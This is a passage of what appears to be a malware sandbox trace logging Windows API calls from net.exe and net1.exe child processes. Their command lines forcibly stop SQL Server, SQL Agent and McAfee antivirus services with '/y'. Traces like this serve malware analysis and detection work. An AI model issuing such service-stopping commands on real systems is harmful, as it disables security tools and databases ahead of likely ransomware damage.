(_String1="start", _String2="stop") returned -14 [0211.073] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.073] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.073] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.073] _wcsicmp (_String1="accounts", _String2="MSSQL$PRACTICEMGT") returned -12 [0211.073] _wcsicmp (_String1="computer", _String2="MSSQL$PRACTICEMGT") returned -10 [0211.073] _wcsicmp (_String1="config", _String2="MSSQL$PRACTICEMGT") returned -10 [0211.073] _wcsicmp (_String1="continue", _String2="MSSQL$PRACTICEMGT") returned -10 [0211.073] _wcsicmp (_String1="cont", _String2="MSSQL$PRACTICEMGT") returned -10 [0211.073] _wcsicmp (_String1="file", _String2="MSSQL$PRACTICEMGT") returned -7 [0211.073] _wcsicmp (_String1="files", _String2="MSSQL$PRACTICEMGT") returned -7 [0211.073] _wcsicmp (_String1="group", _String2="MSSQL$PRACTICEMGT") returned -6 [0211.073] _wcsicmp (_String1="groups", _String2="MSSQL$PRACTICEMGT") returned -6 [0211.073] _wcsicmp (_String1="help", _String2="MSSQL$PRACTICEMGT") returned -5 [0211.073] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PRACTICEMGT") returned -5 [0211.073] _wcsicmp (_String1="localgroup", _String2="MSSQL$PRACTICEMGT") returned -1 [0211.073] _wcsicmp (_String1="pause", _String2="MSSQL$PRACTICEMGT") returned 3 [0211.073] _wcsicmp (_String1="session", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="sessions", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="sess", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="share", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="start", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="stats", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.073] _wcsicmp (_String1="statistics", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.074] _wcsicmp (_String1="stop", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.074] _wcsicmp (_String1="time", _String2="MSSQL$PRACTICEMGT") returned 7 [0211.074] _wcsicmp (_String1="user", _String2="MSSQL$PRACTICEMGT") returned 8 [0211.074] _wcsicmp (_String1="users", _String2="MSSQL$PRACTICEMGT") returned 8 [0211.074] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTICEMGT") returned -12 [0211.074] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTICEMGT") returned -14 [0211.074] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.074] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.074] _wcsicmp (_String1="netpopup", _String2="MSSQL$PRACTICEMGT") returned 1 [0211.074] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.074] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.074] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.074] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.074] _wcsicmp (_String1="work", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.074] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.074] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTICEMGT") returned 3 [0211.074] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTICEMGT") returned -9 [0211.074] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTICEMGT") returned -1 [0211.074] _wcsicmp (_String1="server", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.074] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.074] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.074] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTICEMGT") returned -1 [0211.074] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTICEMGT") returned -12 [0211.074] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTICEMGT") returned 1 [0211.074] _wcsupr (in: _String="MSSQL$PRACTICEMGT" | out: _String="MSSQL$PRACTICEMGT") returned="MSSQL$PRACTICEMGT" [0211.074] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7b5460 [0211.077] GetServiceKeyNameW (in: hSCManager=0x7b5460, lpDisplayName="MSSQL$PRACTICEMGT", lpServiceName=0xacaaf0, lpcchBuffer=0x35f904 | out: lpServiceName="", lpcchBuffer=0x35f904) returned 0 [0211.078] _wcsicmp (_String1="msg", _String2="MSSQL$PRACTICEMGT") returned -12 [0211.078] _wcsicmp (_String1="messenger", _String2="MSSQL$PRACTICEMGT") returned -14 [0211.078] _wcsicmp (_String1="receiver", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.078] _wcsicmp (_String1="rcv", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.078] _wcsicmp (_String1="redirector", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.078] _wcsicmp (_String1="redir", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.078] _wcsicmp (_String1="rdr", _String2="MSSQL$PRACTICEMGT") returned 5 [0211.078] _wcsicmp (_String1="workstation", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.078] _wcsicmp (_String1="work", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.078] _wcsicmp (_String1="wksta", _String2="MSSQL$PRACTICEMGT") returned 10 [0211.078] _wcsicmp (_String1="prdr", _String2="MSSQL$PRACTICEMGT") returned 3 [0211.078] _wcsicmp (_String1="devrdr", _String2="MSSQL$PRACTICEMGT") returned -9 [0211.078] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PRACTICEMGT") returned -1 [0211.078] _wcsicmp (_String1="server", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.078] _wcsicmp (_String1="svr", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.078] _wcsicmp (_String1="srv", _String2="MSSQL$PRACTICEMGT") returned 6 [0211.078] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PRACTICEMGT") returned -1 [0211.078] _wcsicmp (_String1="alerter", _String2="MSSQL$PRACTICEMGT") returned -12 [0211.078] _wcsicmp (_String1="netlogon", _String2="MSSQL$PRACTICEMGT") returned 1 [0211.078] NetServiceControl (in: servername=0x0, service="MSSQL$PRACTICEMGT", opcode=0x0, arg=0x0, bufptr=0x35f900 | out: bufptr=0x35f900) returned 0x889 [0211.079] wcscpy_s (in: _Destination=0xaca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.079] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0211.080] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0211.081] GetFileType (hFile=0x26c) returned 0x3 [0211.081] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7b3f90 [0211.081] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7b3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0211.081] WriteFile (in: hFile=0x26c, lpBuffer=0x7b3f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35f840, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35f840, lpOverlapped=0x0) returned 0 [0211.081] LocalFree (hMem=0x7b3f90) returned 0x0 [0211.081] GetFileType (hFile=0x26c) returned 0x3 [0211.081] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7b6238 [0211.081] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7b6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n{", lpUsedDefaultChar=0x0) returned 2 [0211.081] WriteFile (in: hFile=0x26c, lpBuffer=0x7b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35f840, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35f840, lpOverlapped=0x0) returned 0 [0211.081] LocalFree (hMem=0x7b6238) returned 0x0 [0211.081] _ultow (in: _Dest=0x889, _Radix=3537008 | out: _Dest=0x889) returned="2185" [0211.081] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0211.081] GetFileType (hFile=0x26c) returned 0x3 [0211.081] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7b6238 [0211.081] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7b6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0211.081] WriteFile (in: hFile=0x26c, lpBuffer=0x7b6238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35f84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35f84c, lpOverlapped=0x0) returned 0 [0211.081] LocalFree (hMem=0x7b6238) returned 0x0 [0211.081] GetFileType (hFile=0x26c) returned 0x3 [0211.081] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7b6238 [0211.081] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7b6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n{", lpUsedDefaultChar=0x0) returned 2 [0211.081] WriteFile (in: hFile=0x26c, lpBuffer=0x7b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35f84c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x35f84c, lpOverlapped=0x0) returned 0 [0211.082] LocalFree (hMem=0x7b6238) returned 0x0 [0211.082] NetApiBufferFree (Buffer=0x7b1c78) returned 0x0 [0211.082] NetApiBufferFree (Buffer=0x7b1c90) returned 0x0 [0211.082] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" [0211.082] exit (_Code=2) Process: id = "292" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6d49e000" os_pid = "0x720" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 465 os_tid = 0xb0c Process: id = "293" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4d6ee000" os_pid = "0x68c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "292" os_parent_pid = "0x720" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 466 os_tid = 0x630 [0211.214] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2dfaa8 | out: lpSystemTimeAsFileTime=0x2dfaa8*(dwLowDateTime=0x47160240, dwHighDateTime=0x1d57a87)) [0211.214] GetCurrentProcessId () returned 0x68c [0211.214] GetCurrentThreadId () returned 0x630 [0211.214] GetTickCount () returned 0x116e62b [0211.214] QueryPerformanceCounter (in: lpPerformanceCount=0x2dfaa0 | out: lpPerformanceCount=0x2dfaa0*=33149894847) returned 1 [0211.215] GetModuleHandleA (lpModuleName=0x0) returned 0x9a0000 [0211.215] __set_app_type (_Type=0x1) [0211.215] __p__fmode () returned 0x74eb31f4 [0211.215] __p__commode () returned 0x74eb31fc [0211.215] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x9affe6) returned 0x0 [0211.215] __getmainargs (in: _Argc=0x9b9064, _Argv=0x9b906c, _Env=0x9b9068, _DoWildCard=0, _StartInfo=0x9b9024 | out: _Argc=0x9b9064, _Argv=0x9b906c, _Env=0x9b9068) returned 0 [0211.215] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.215] GetConsoleOutputCP () returned 0x1b5 [0211.215] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x9b9080 | out: lpCPInfo=0x9b9080) returned 1 [0211.215] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.218] sprintf_s (in: _DstBuf=0x2dfa60, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.219] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.220] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.220] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.220] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" [0211.220] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2df82c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.220] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x72) returned 0x2ef788 [0211.221] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.221] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfa30 | out: Buffer=0x2dfa30*=0x2f1c78) returned 0x0 [0211.221] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2dfa30 | out: Buffer=0x2dfa30*=0x2f1c90) returned 0x0 [0211.221] _fileno (_File=0x74eb2900) returned -2 [0211.221] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.221] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.221] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.221] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.221] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.221] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.221] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.221] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.221] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.221] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.221] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.221] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.221] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.221] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.221] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.221] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.222] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.222] _wcsicmp (_String1="share", _String2="stop") returned -12 [0211.222] _wcsicmp (_String1="start", _String2="stop") returned -14 [0211.222] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0211.222] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0211.222] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0211.222] _wcsicmp (_String1="accounts", _String2="SQLAgent$TPSAMA") returned -18 [0211.222] _wcsicmp (_String1="computer", _String2="SQLAgent$TPSAMA") returned -16 [0211.222] _wcsicmp (_String1="config", _String2="SQLAgent$TPSAMA") returned -16 [0211.222] _wcsicmp (_String1="continue", _String2="SQLAgent$TPSAMA") returned -16 [0211.222] _wcsicmp (_String1="cont", _String2="SQLAgent$TPSAMA") returned -16 [0211.222] _wcsicmp (_String1="file", _String2="SQLAgent$TPSAMA") returned -13 [0211.222] _wcsicmp (_String1="files", _String2="SQLAgent$TPSAMA") returned -13 [0211.222] _wcsicmp (_String1="group", _String2="SQLAgent$TPSAMA") returned -12 [0211.222] _wcsicmp (_String1="groups", _String2="SQLAgent$TPSAMA") returned -12 [0211.222] _wcsicmp (_String1="help", _String2="SQLAgent$TPSAMA") returned -11 [0211.222] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$TPSAMA") returned -11 [0211.222] _wcsicmp (_String1="localgroup", _String2="SQLAgent$TPSAMA") returned -7 [0211.222] _wcsicmp (_String1="pause", _String2="SQLAgent$TPSAMA") returned -3 [0211.222] _wcsicmp (_String1="session", _String2="SQLAgent$TPSAMA") returned -12 [0211.222] _wcsicmp (_String1="sessions", _String2="SQLAgent$TPSAMA") returned -12 [0211.222] _wcsicmp (_String1="sess", _String2="SQLAgent$TPSAMA") returned -12 [0211.222] _wcsicmp (_String1="share", _String2="SQLAgent$TPSAMA") returned -9 [0211.222] _wcsicmp (_String1="start", _String2="SQLAgent$TPSAMA") returned 3 [0211.222] _wcsicmp (_String1="stats", _String2="SQLAgent$TPSAMA") returned 3 [0211.222] _wcsicmp (_String1="statistics", _String2="SQLAgent$TPSAMA") returned 3 [0211.222] _wcsicmp (_String1="stop", _String2="SQLAgent$TPSAMA") returned 3 [0211.222] _wcsicmp (_String1="time", _String2="SQLAgent$TPSAMA") returned 1 [0211.222] _wcsicmp (_String1="user", _String2="SQLAgent$TPSAMA") returned 2 [0211.222] _wcsicmp (_String1="users", _String2="SQLAgent$TPSAMA") returned 2 [0211.222] _wcsicmp (_String1="msg", _String2="SQLAgent$TPSAMA") returned -6 [0211.222] _wcsicmp (_String1="messenger", _String2="SQLAgent$TPSAMA") returned -6 [0211.222] _wcsicmp (_String1="receiver", _String2="SQLAgent$TPSAMA") returned -1 [0211.222] _wcsicmp (_String1="rcv", _String2="SQLAgent$TPSAMA") returned -1 [0211.222] _wcsicmp (_String1="netpopup", _String2="SQLAgent$TPSAMA") returned -5 [0211.222] _wcsicmp (_String1="redirector", _String2="SQLAgent$TPSAMA") returned -1 [0211.222] _wcsicmp (_String1="redir", _String2="SQLAgent$TPSAMA") returned -1 [0211.223] _wcsicmp (_String1="rdr", _String2="SQLAgent$TPSAMA") returned -1 [0211.223] _wcsicmp (_String1="workstation", _String2="SQLAgent$TPSAMA") returned 4 [0211.223] _wcsicmp (_String1="work", _String2="SQLAgent$TPSAMA") returned 4 [0211.223] _wcsicmp (_String1="wksta", _String2="SQLAgent$TPSAMA") returned 4 [0211.223] _wcsicmp (_String1="prdr", _String2="SQLAgent$TPSAMA") returned -3 [0211.223] _wcsicmp (_String1="devrdr", _String2="SQLAgent$TPSAMA") returned -15 [0211.223] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$TPSAMA") returned -7 [0211.223] _wcsicmp (_String1="server", _String2="SQLAgent$TPSAMA") returned -12 [0211.223] _wcsicmp (_String1="svr", _String2="SQLAgent$TPSAMA") returned 5 [0211.223] _wcsicmp (_String1="srv", _String2="SQLAgent$TPSAMA") returned 1 [0211.223] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$TPSAMA") returned -7 [0211.223] _wcsicmp (_String1="alerter", _String2="SQLAgent$TPSAMA") returned -18 [0211.223] _wcsicmp (_String1="netlogon", _String2="SQLAgent$TPSAMA") returned -5 [0211.223] _wcsupr (in: _String="SQLAgent$TPSAMA" | out: _String="SQLAGENT$TPSAMA") returned="SQLAGENT$TPSAMA" [0211.223] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2f5460 [0211.226] GetServiceKeyNameW (in: hSCManager=0x2f5460, lpDisplayName="SQLAGENT$TPSAMA", lpServiceName=0x9baaf0, lpcchBuffer=0x2df9cc | out: lpServiceName="", lpcchBuffer=0x2df9cc) returned 0 [0211.226] _wcsicmp (_String1="msg", _String2="SQLAGENT$TPSAMA") returned -6 [0211.226] _wcsicmp (_String1="messenger", _String2="SQLAGENT$TPSAMA") returned -6 [0211.226] _wcsicmp (_String1="receiver", _String2="SQLAGENT$TPSAMA") returned -1 [0211.226] _wcsicmp (_String1="rcv", _String2="SQLAGENT$TPSAMA") returned -1 [0211.226] _wcsicmp (_String1="redirector", _String2="SQLAGENT$TPSAMA") returned -1 [0211.226] _wcsicmp (_String1="redir", _String2="SQLAGENT$TPSAMA") returned -1 [0211.226] _wcsicmp (_String1="rdr", _String2="SQLAGENT$TPSAMA") returned -1 [0211.227] _wcsicmp (_String1="workstation", _String2="SQLAGENT$TPSAMA") returned 4 [0211.227] _wcsicmp (_String1="work", _String2="SQLAGENT$TPSAMA") returned 4 [0211.227] _wcsicmp (_String1="wksta", _String2="SQLAGENT$TPSAMA") returned 4 [0211.227] _wcsicmp (_String1="prdr", _String2="SQLAGENT$TPSAMA") returned -3 [0211.227] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$TPSAMA") returned -15 [0211.227] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$TPSAMA") returned -7 [0211.227] _wcsicmp (_String1="server", _String2="SQLAGENT$TPSAMA") returned -12 [0211.227] _wcsicmp (_String1="svr", _String2="SQLAGENT$TPSAMA") returned 5 [0211.227] _wcsicmp (_String1="srv", _String2="SQLAGENT$TPSAMA") returned 1 [0211.227] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$TPSAMA") returned -7 [0211.227] _wcsicmp (_String1="alerter", _String2="SQLAGENT$TPSAMA") returned -18 [0211.227] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$TPSAMA") returned -5 [0211.227] NetServiceControl (in: servername=0x0, service="SQLAGENT$TPSAMA", opcode=0x0, arg=0x0, bufptr=0x2df9c8 | out: bufptr=0x2df9c8) returned 0x889 [0211.228] wcscpy_s (in: _Destination=0x9ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0211.228] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0211.228] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x9bb338, nSize=0x800, Arguments=0x9b9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0211.230] GetFileType (hFile=0x26c) returned 0x3 [0211.230] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2f3f90 [0211.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2f3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0211.230] WriteFile (in: hFile=0x26c, lpBuffer=0x2f3f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2df908, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df908, lpOverlapped=0x0) returned 0 [0211.230] LocalFree (hMem=0x2f3f90) returned 0x0 [0211.230] GetFileType (hFile=0x26c) returned 0x3 [0211.230] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6238 [0211.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0211.230] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df908, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df908, lpOverlapped=0x0) returned 0 [0211.230] LocalFree (hMem=0x2f6238) returned 0x0 [0211.230] _ultow (in: _Dest=0x889, _Radix=3012920 | out: _Dest=0x889) returned="2185" [0211.230] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x9bb338, nSize=0x800, Arguments=0x9b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0211.230] GetFileType (hFile=0x26c) returned 0x3 [0211.230] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2f6238 [0211.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2f6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0211.230] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2df914, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df914, lpOverlapped=0x0) returned 0 [0211.230] LocalFree (hMem=0x2f6238) returned 0x0 [0211.230] GetFileType (hFile=0x26c) returned 0x3 [0211.230] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2f6238 [0211.230] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2f6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n/", lpUsedDefaultChar=0x0) returned 2 [0211.230] WriteFile (in: hFile=0x26c, lpBuffer=0x2f6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2df914, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2df914, lpOverlapped=0x0) returned 0 [0211.231] LocalFree (hMem=0x2f6238) returned 0x0 [0211.231] NetApiBufferFree (Buffer=0x2f1c78) returned 0x0 [0211.231] NetApiBufferFree (Buffer=0x2f1c90) returned 0x0 [0211.231] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPSAMA /y" [0211.231] exit (_Code=2) Process: id = "294" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c5a3000" os_pid = "0x578" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 467 os_tid = 0xc8 Process: id = "295" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4b643000" os_pid = "0x82c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "294" os_parent_pid = "0x578" cmd_line = "C:\\Windows\\system32\\net1 stop McAfeeFramework /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 468 os_tid = 0x580 [0211.414] GetSystemTimeAsFileTime (in: 